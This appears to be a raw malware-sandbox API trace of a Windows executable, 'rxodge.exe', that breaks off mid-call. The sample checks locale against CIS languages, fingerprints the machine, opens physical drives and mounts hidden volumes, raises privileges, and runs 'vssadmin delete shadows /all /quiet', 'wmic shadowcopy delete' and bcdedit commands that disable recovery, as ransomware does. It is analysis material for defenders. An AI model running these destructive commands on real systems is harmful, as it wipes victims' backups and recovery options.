# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 30.07.2020 12:04:19.538 Process: id = "1" image_name = "rxodge.exe" filename = "c:\\users\\fd1hvy\\desktop\\rxodge.exe" page_root = "0x18223000" os_pid = "0x11dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\rxodge.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x11ec [0074.964] GetLocaleInfoW (in: Locale=0x800, LCType=0x1001, lpLCData=0x32fc610, cchData=160 | out: lpLCData="English") returned 8 [0074.978] lstrcmpiW (lpString1="English", lpString2="Azerbaijani") returned 1 [0074.982] lstrcmpiW (lpString1="English", lpString2="Armenian") returned 1 [0074.982] lstrcmpiW (lpString1="English", lpString2="Belorussian") returned 1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Kazakh") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Kyrgyz") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Moldavian") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Tajik") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Russian") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Turkmen") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Uzbek") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Ukrainian") returned -1 [0074.983] lstrcmpiW (lpString1="English", lpString2="Georgian") returned -1 [0074.983] GetComputerNameW (in: lpBuffer=0x32fef18, nSize=0x32ff9dc | out: lpBuffer="NQDPDE", nSize=0x32ff9dc) returned 1 [0074.984] GetUserNameW (in: lpBuffer=0x32fed10, pcbBuffer=0x32ff9d8 | out: lpBuffer="FD1HVy", pcbBuffer=0x32ff9d8) returned 1 [0074.998] lstrcpyW (in: lpString1=0x32fea00, lpString2="SOFTWARE\\Microsoft\\Cryptography" | out: lpString1="SOFTWARE\\Microsoft\\Cryptography") returned="SOFTWARE\\Microsoft\\Cryptography" [0074.999] VirtualAlloc (lpAddress=0x0, dwSize=0x1fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2fb0000 [0074.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x32fc7ac | out: phkResult=0x32fc7ac*=0x1f4) returned 0x0 [0074.999] RegQueryValueExW (in: hKey=0x1f4, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x2fb0000, lpcbData=0x32fc7a8*=0x1fc | out: lpType=0x0, lpData=0x2fb0000*=0x33, lpcbData=0x32fc7a8*=0x4a) returned 0x0 [0074.999] RegCloseKey (hKey=0x1f4) returned 0x0 [0075.000] VirtualAlloc (lpAddress=0x0, dwSize=0x1fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2fc0000 [0075.000] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x32fc7a4 | out: phkResult=0x32fc7a4*=0x1f4) returned 0x0 [0075.000] RegQueryValueExW (in: hKey=0x1f4, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x2fc0000, lpcbData=0x32fc7a0*=0x1fc | out: lpType=0x0, lpData=0x2fc0000*=0x57, lpcbData=0x32fc7a0*=0x1e) returned 0x0 [0075.000] RegCloseKey (hKey=0x1f4) returned 0x0 [0075.000] lstrcpyW (in: lpString1=0x32ff6d0, lpString2="33d770d0-06bc-47c5-8714-222cdac43a71" | out: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71") returned="33d770d0-06bc-47c5-8714-222cdac43a71" [0075.000] lstrcatW (in: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Windows 10 Pro" | out: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 Pro") returned="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 Pro" [0075.000] lstrcatW (in: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 Pro", lpString2="FD1HVy" | out: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 ProFD1HVy") returned="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 ProFD1HVy" [0075.001] lstrcatW (in: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 ProFD1HVy", lpString2="NQDPDE" | out: lpString1="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 ProFD1HVyNQDPDE") returned="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 ProFD1HVyNQDPDE" [0075.001] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x2fe0000 [0075.001] lstrlenW (lpString="NQDPDE") returned 6 [0075.001] wsprintfW (in: param_1=0x2fe0000, param_2="%08X" | out: param_1="B8CF767A") returned 8 [0075.002] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x2ff0000 [0075.002] lstrlenW (lpString="FD1HVy") returned 6 [0075.002] wsprintfW (in: param_1=0x2ff0000, param_2="%08X" | out: param_1="6D41A0EB") returned 8 [0075.002] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x33d0000 [0075.002] lstrlenW (lpString="33d770d0-06bc-47c5-8714-222cdac43a71") returned 36 [0075.002] wsprintfW (in: param_1=0x33d0000, param_2="%08X" | out: param_1="956591F9") returned 8 [0075.003] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x33e0000 [0075.003] lstrlenW (lpString="Windows 10 Pro") returned 14 [0075.003] wsprintfW (in: param_1=0x33e0000, param_2="%08X" | out: param_1="C63D911C") returned 8 [0075.003] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x33f0000 [0075.003] lstrlenW (lpString="33d770d0-06bc-47c5-8714-222cdac43a71Windows 10 ProFD1HVyNQDPDE") returned 62 [0075.003] wsprintfW (in: param_1=0x33f0000, param_2="%08X" | out: param_1="9A4B10B7") returned 8 [0075.004] wsprintfW (in: param_1=0x32ff320, param_2="%s-%s-%s-%s-%s" | out: param_1="956591F9-C63D911C-6D41A0EB-B8CF767A-9A4B10B7") returned 44 [0075.004] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\rxodge.exe\" " [0075.004] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\FD1HVy\\Desktop\\rxodge.exe\" ", pNumArgs=0x32ffa0c | out: pNumArgs=0x32ffa0c) returned 0x353f960*="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe" [0075.005] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="956591F9-C63D911C-6D41A0EB-B8CF767A-9A4B10B7") returned 0x1f4 [0075.005] GetLastError () returned 0x0 [0075.005] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE0") returned 18 [0075.005] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0x1f8 [0075.115] DeviceIoControl (in: hDevice=0x1f8, dwIoControlCode=0x7c0f4, lpInBuffer=0x32ff920*, nInBufferSize=0x28, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x32ff9e4, lpOverlapped=0x0 | out: lpInBuffer=0x32ff920*, lpOutBuffer=0x0*, lpBytesReturned=0x32ff9e4*=0x0, lpOverlapped=0x0) returned 1 [0075.119] DeviceIoControl (in: hDevice=0x1f8, dwIoControlCode=0x70140, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x32ff9e4, lpOverlapped=0x0 | out: lpOutBuffer=0x0*, lpBytesReturned=0x32ff9e4*=0x0, lpOverlapped=0x0) returned 1 [0075.124] CloseHandle (hObject=0x1f8) returned 1 [0075.125] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE1") returned 18 [0075.132] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE1" (normalized: "physicaldrive1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.133] CloseHandle (hObject=0xffffffff) returned 1 [0075.134] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE2") returned 18 [0075.140] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE2" (normalized: "physicaldrive2"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.140] CloseHandle (hObject=0xffffffff) returned 1 [0075.141] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE3") returned 18 [0075.148] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE3" (normalized: "physicaldrive3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.148] CloseHandle (hObject=0xffffffff) returned 1 [0075.148] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE4") returned 18 [0075.155] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE4" (normalized: "physicaldrive4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.155] CloseHandle (hObject=0xffffffff) returned 1 [0075.155] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE5") returned 18 [0075.162] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE5" (normalized: "physicaldrive5"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.162] CloseHandle (hObject=0xffffffff) returned 1 [0075.167] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE6") returned 18 [0075.174] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE6" (normalized: "physicaldrive6"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.174] CloseHandle (hObject=0xffffffff) returned 1 [0075.174] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE7") returned 18 [0075.181] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE7" (normalized: "physicaldrive7"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.182] CloseHandle (hObject=0xffffffff) returned 1 [0075.182] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE8") returned 18 [0075.189] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE8" (normalized: "physicaldrive8"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.189] CloseHandle (hObject=0xffffffff) returned 1 [0075.189] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE9") returned 18 [0075.200] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE9" (normalized: "physicaldrive9"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.201] CloseHandle (hObject=0xffffffff) returned 1 [0075.201] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE10") returned 19 [0075.208] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE10" (normalized: "physicaldrive10"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.208] CloseHandle (hObject=0xffffffff) returned 1 [0075.208] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE11") returned 19 [0075.215] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE11" (normalized: "physicaldrive11"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.217] CloseHandle (hObject=0xffffffff) returned 1 [0075.217] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE12") returned 19 [0075.223] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE12" (normalized: "physicaldrive12"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.224] CloseHandle (hObject=0xffffffff) returned 1 [0075.224] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE13") returned 19 [0075.230] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE13" (normalized: "physicaldrive13"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.232] CloseHandle (hObject=0xffffffff) returned 1 [0075.232] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE14") returned 19 [0075.238] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE14" (normalized: "physicaldrive14"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.239] CloseHandle (hObject=0xffffffff) returned 1 [0075.239] wsprintfW (in: param_1=0x32ff120, param_2="\\\\.\\PHYSICALDRIVE%d" | out: param_1="\\\\.\\PHYSICALDRIVE15") returned 19 [0075.246] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE15" (normalized: "physicaldrive15"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x1, hTemplateFile=0x0) returned 0xffffffff [0075.249] CloseHandle (hObject=0xffffffff) returned 1 [0075.249] FindFirstVolumeA (in: lpszVolumeName=0x32ff5d0, cchBufferLength=0x100 | out: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\") returned 0x3540dc0 [0075.250] GetVolumePathNamesForVolumeNameA (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\", lpszVolumePathNames=0x32ff3d0, cchBufferLength=0x100, lpcchReturnLength=0x32ff9d0 | out: lpszVolumePathNames="C:\\", lpcchReturnLength=0x32ff9d0) returned 1 [0075.250] lstrlenA (lpString="C:\\") returned 3 [0075.250] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x32fe800, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x32ff964, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x32fe900, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x32ff964*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0075.251] FindNextVolumeA (in: hFindVolume=0x3540dc0, lpszVolumeName=0x32ff5d0, cchBufferLength=0x100 | out: hFindVolume=0x3540dc0, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0075.251] GetVolumePathNamesForVolumeNameA (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\", lpszVolumePathNames=0x32ff3d0, cchBufferLength=0x100, lpcchReturnLength=0x32ff9d0 | out: lpszVolumePathNames="", lpcchReturnLength=0x32ff9d0) returned 1 [0075.252] lstrlenA (lpString="") returned 0 [0075.252] GetLogicalDrives () returned 0x4 [0075.252] SetVolumeMountPointA (lpszVolumeMountPoint="D:\\", lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0075.255] GetVolumePathNamesForVolumeNameA (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\", lpszVolumePathNames=0x32ff3d0, cchBufferLength=0x100, lpcchReturnLength=0x32ff9d0 | out: lpszVolumePathNames="D:\\", lpcchReturnLength=0x32ff9d0) returned 1 [0075.256] GetVolumeInformationA (in: lpRootPathName="D:\\", lpVolumeNameBuffer=0x32fe800, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x32ff964, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x32fe900, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x32ff964*=0xce1d53da, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0075.256] FindNextVolumeA (in: hFindVolume=0x3540dc0, lpszVolumeName=0x32ff5d0, cchBufferLength=0x100 | out: hFindVolume=0x3540dc0, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 0 [0075.256] FindVolumeClose (hFindVolume=0x3540dc0) returned 1 [0075.259] SHEmptyRecycleBinW (hwnd=0x0, pszRootPath=0x0, dwFlags=0x7) returned 0x8000ffff [0086.090] StrToIntA (lpSrc="119w") returned 119 [0086.090] StrToIntA (lpSrc="472ª") returned 472 [0086.090] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x210 [0086.090] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x20c [0086.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec2e30, lpParameter=0x32ff9a0, dwCreationFlags=0x0, lpThreadId=0x32ff9cc | out: lpThreadId=0x32ff9cc*=0x704) returned 0x33c [0086.092] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0091.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec2cc0, lpParameter=0x32ff9a0, dwCreationFlags=0x0, lpThreadId=0x32ff9c8 | out: lpThreadId=0x32ff9c8*=0xd64) returned 0x34c [0091.039] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0xffffffff) returned 0x0 [0102.719] GetCurrentProcess () returned 0xffffffff [0102.719] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x32ffa04 | out: TokenHandle=0x32ffa04*=0x358) returned 1 [0102.719] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTakeOwnershipPrivilege", lpLuid=0x32ff994 | out: lpLuid=0x32ff994*(LowPart=0x9, HighPart=0)) returned 1 [0102.723] AdjustTokenPrivileges (in: TokenHandle=0x358, DisableAllPrivileges=0, NewState=0x32ff990*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0102.724] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0x32ff994 | out: lpLuid=0x32ff994*(LowPart=0x12, HighPart=0)) returned 1 [0102.725] AdjustTokenPrivileges (in: TokenHandle=0x358, DisableAllPrivileges=0, NewState=0x32ff990*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0102.725] CloseHandle (hObject=0x358) returned 1 [0102.725] AllocateAndInitializeSid (in: pIdentifierAuthority=0x32ff9ec, nSubAuthorityCount=0x1, nSubAuthority0=0x0, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xecc960 | out: pSid=0xecc960*=0x3570b48*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1 [0102.725] GetNativeSystemInfo (in: lpSystemInfo=0x32fc590 | out: lpSystemInfo=0x32fc590*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0102.726] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0102.726] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x77326eb0 [0102.727] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0102.727] GetStartupInfoW (in: lpStartupInfo=0x32fc5b4 | out: lpStartupInfo=0x32fc5b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0102.727] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="wmic.exe shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x32fc5b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x32fc7a8 | out: lpCommandLine="wmic.exe shadowcopy delete", lpProcessInformation=0x32fc7a8*(hProcess=0x350, hThread=0x358, dwProcessId=0x380, dwThreadId=0x484)) returned 1 [0104.093] CloseHandle (hObject=0x350) returned 1 [0104.093] CloseHandle (hObject=0x358) returned 1 [0104.093] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0xffffffff) returned 0xffffffff [0104.094] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x32fc5b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x32fc7a8 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x32fc7a8*(hProcess=0x350, hThread=0x358, dwProcessId=0x7e4, dwThreadId=0xcf4)) returned 1 [0106.622] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0xffffffff) returned 0x0 [0147.398] CloseHandle (hObject=0x350) returned 1 [0147.398] CloseHandle (hObject=0x358) returned 1 [0147.398] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x32fc5b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x32fc7a8 | out: lpCommandLine="bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x32fc7a8*(hProcess=0x350, hThread=0x358, dwProcessId=0x1028, dwThreadId=0x11cc)) returned 1 [0148.818] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0xffffffff) returned 0x0 [0154.117] CloseHandle (hObject=0x350) returned 1 [0154.117] CloseHandle (hObject=0x358) returned 1 [0154.117] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="bcdedit /set {default} bootstatuspolicy IgnoreAllFailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x32fc5b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x32fc7a8 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy IgnoreAllFailures", lpProcessInformation=0x32fc7a8*(hProcess=0x350, hThread=0x358, dwProcessId=0x1140, dwThreadId=0x13cc)) returned 1 [0154.215] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0xffffffff) returned 0x0 [0158.174] CloseHandle (hObject=0x350) returned 1 [0158.174] CloseHandle (hObject=0x358) returned 1 [0158.174] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="bcdedit /set {globalsettings} advancedoptions false", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x32fc5b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\rxodge.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x32fc7a8 | out: 